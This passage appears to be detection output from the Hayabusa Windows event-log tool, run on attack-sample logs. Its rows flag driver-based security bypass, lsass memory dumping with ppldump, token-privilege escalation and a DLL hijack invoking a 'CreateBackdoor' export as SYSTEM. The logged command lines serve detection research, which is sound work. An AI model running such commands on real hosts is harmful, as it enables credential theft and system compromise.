C:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 17:28:13.147 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Supicious image loaded - ntoskrnl | Image: C:\Windows\System32\ntoskrnl.exe | Process: C:\Users\Public\BYOV\TDL\Furutaka.exe 
| Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=667AFD98C8BAA2CF95C9EE087CB36A0F6508A942,MD5=0EED97AD8D855B5EDF948A7866D5F874,SHA256=C36A8FAC48690632731D56747CBBDCE2453D3E5303A73896505D495F7678DFF0,IMPHASH=4D717BA02FC8AA76777B033C52AA4694",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: ppldump.exe -p lsass.exe -o a.png | Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x97734 | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Hash: SHA1=C8BBBB2554D7C1F29B8670A14BE4E52D7AF81A24,MD5=DD7D6D8101A6412ABFA7B55F10E1D31B,SHA256=70908F9BBC59198FEBE0D1CA0E34A9E79C68F5053A39A0BA0C6F6CEC9ED1A875,IMPHASH=0EFF65F1D3AC0A58787724FB03E2D1BC",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\Public\BYOV\ZAM64\ppldump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5016 | Src PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Tgt PID: 624 | Tgt PGUID: 747F3D96-A042-5E41-0000-0010E4560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:25.164 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:25.193 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:25.193 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:27.797 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-11 20:05:37.148 +09:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\RwDrv.sys | Status: Valid | Hash: SHA1=66E95DAEE3D1244A029D7F3D91915F1F233D1916,MD5=60E84516C6EC6DFDAE7B422D1F7CAB06,SHA256=D969845EF6ACC8E5D3421A7CE7E244F419989710871313B04148F9B322751E5D,IMPHASH=955E7B12A8FA06444C68E54026C45DE1",../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx +2020-02-11 20:05:37.148 +09:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\RwDrv.sys | Signature: ChongKim Chan,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx +2020-03-07 22:17:38.534 +09:00,MSEDGEWIN10,4698,info,,Task 
Created,"Name: \FullPowersTask | Content: \FullPowersTask S-1-5-19 LeastPrivilege SeAssignPrimaryTokenPrivilege SeAuditPrivilege SeChangeNotifyPrivilege SeCreateGlobalPrivilege SeImpersonatePrivilege SeIncreaseQuotaPrivilege SeIncreaseWorkingSetPrivilege IgnoreNew true true true false false PT10M PT1H true false true true false false false false false PT72H 7 C:\Users\Public\Tools\TokenManip\FullPowers.exe -t 4932 | User: LOCAL SERVICE | LID: 0x3e5",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx +2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,info,,Task Deleted,Name: \FullPowersTask | User: LOCAL SERVICE | LID: 0x3e5,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx +2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx +2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,CredAccess,LSASS Access from Non System Account,,../hayabusa-rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4663,high,CredAccess,Generic Password 
Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: usoclient StartInteractiveScan | Process: C:\Windows\System32\UsoClient.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 2276 | PGUID: 747F3D96-9F60-5E75-0000-001081BE1D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:16.507 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 7696 | PGUID: 747F3D96-9F60-5E75-0000-0010E7CC1D00 | Hash: SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.016 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 4696 | PGUID: 747F3D96-9F60-5E75-0000-00104ADA1D00 | Hash: 
SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.982 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.996 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.998 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.003 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.005 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.011 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.011 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.018 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.024 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.042 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.050 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:19.873 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:19.877 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: 
